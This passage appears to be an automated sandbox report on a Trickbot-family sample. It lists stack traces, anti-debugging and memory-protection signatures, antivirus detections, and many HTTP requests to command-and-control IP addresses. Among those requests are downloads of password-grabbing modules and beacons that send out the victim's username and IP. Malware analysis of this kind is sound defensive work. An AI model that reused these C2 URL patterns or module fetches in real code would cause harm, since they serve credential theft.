New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1 0x126bdd exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 853603392 registers.r15: 853880032 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 1168904 registers.r11: -125 registers.r8: 3 registers.r9: 1951132416 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 1169296 registers.rax: 4 registers.r13: 0	1
__exception__ Aug. 3, 2021, 7:38 a.m.	stacktrace: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97 KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278 RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7 stacktrace+0x1d1 memdup-0x62 @ 0x744205bd hook_in_monitor+0x45 lde-0x133 @ 0x744142ea New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86 VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096 VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6 VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1 0x126bdd exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a exception.instruction: mov rax, qword ptr [rcx] exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 105050 exception.address: 0x771d9a5a registers.r14: 852564144 registers.r15: 853880416 registers.rcx: 27 registers.rsi: 3 registers.r10: 0 registers.rbx: 2 registers.rsp: 1168904 registers.r11: -125 registers.r8: 3 registers.r9: 1951132416 registers.rdx: 3 registers.r12: 40 registers.rbp: 3 registers.rdi: 1169296 registers.rax: 4 registers.r13: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (28 events)

suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/SPYVhO46b0DEThQMydS2Zfd4e8/
suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-toolsHN1H3H%5Cftdownloaddocumenthn.grf/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://5.152.175.57/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabb64/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/vrvjnLXDTHh7rxb7xb/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/VVFTRPXNNPLIHFMHFQF/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://105.27.205.34/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabc64/
suspicious_features	Connection to IP address	suspicious_request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/RguEiTZB8CRul1FpJkUlRGDdx8/
suspicious_features	Connection to IP address	suspicious_request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://182.253.210.130/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabb64/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/hzJfcDAclgRsE45qcKUZSccHLZoSl/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/BPPXFPXZDBXTTXN/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/THBJBHXZZHFTFFNVJ/7/
suspicious_features	Connection to IP address	suspicious_request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/23/100019/

Performs some HTTP requests (29 events)

request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
request	GET https://www.myexternalip.com/raw
request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/SPYVhO46b0DEThQMydS2Zfd4e8/
request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5Cwise-toolsHN1H3H%5Cftdownloaddocumenthn.grf/0/
request	GET https://216.166.148.187/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://5.152.175.57/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabb64/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/vrvjnLXDTHh7rxb7xb/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://46.99.175.217/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/VVFTRPXNNPLIHFMHFQF/7/
request	GET https://105.27.205.34/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabc64/
request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/RguEiTZB8CRul1FpJkUlRGDdx8/
request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
request	GET https://185.56.175.122/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://182.253.210.130/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/pwgrabb64/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/5/file/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/hzJfcDAclgRsE45qcKUZSccHLZoSl/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/user/test22/0/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/BPPXFPXZDBXTTXN/7/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/10/62/THBJBHXZZHFTFFNVJ/7/
request	GET https://184.74.99.214/rob118/TEST22-PC_W617601.3C7F39ECB3B6699FD2D3B4D4F19A2BBF/23/100019/

Allocates read-write-execute memory (usually to unpack itself) (21 events)

Time & API	Arguments	Status	Return
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7375f000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756a1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d21000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d01000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73cc1000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72b60000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a71000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a34000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a72000 process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73ca1000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 233472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00870000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73c81000 process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 278528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff		3221225496
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a90000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fe0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 region_size: 163840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 3, 2021, 7:36 a.m.	process_identifier: 2888 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000390000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0

A process attempted to delay the analysis task. (1 event)

description

wermgr.exe tried to sleep 126 seconds, actually delayed analysis time by 126 seconds

Creates a suspicious process (2 events)

cmdline	C:\Windows\system32\svchost.exe
cmdline	C:\Windows\system32\cmd.exe

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

CrowdStrike	win/malicious_confidence_70% (D)
Paloalto	generic.ml
Kaspersky	UDS:Trojan.Win32.Trickpak.gen
FireEye	Generic.mg.4667f2ac85f21d40

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 3, 2021, 7:43 a.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 3, 2021, 7:36 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0003f800', u'virtual_address': u'0x000a8000', u'entropy': 7.819200292606041, u'name': u'.rsrc', u'virtual_size': u'0x0003f692'}

entropy

7.81920029261

description

A section with a high entropy has been found

entropy

0.27078891258

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 3, 2021, 7:36 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (24 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (8 events)

Time & API	Arguments	Status
NtTerminateProcess Aug. 3, 2021, 7:43 a.m.	status_code: 0x00000000 process_identifier: 2256 process_handle: 0x0000011c
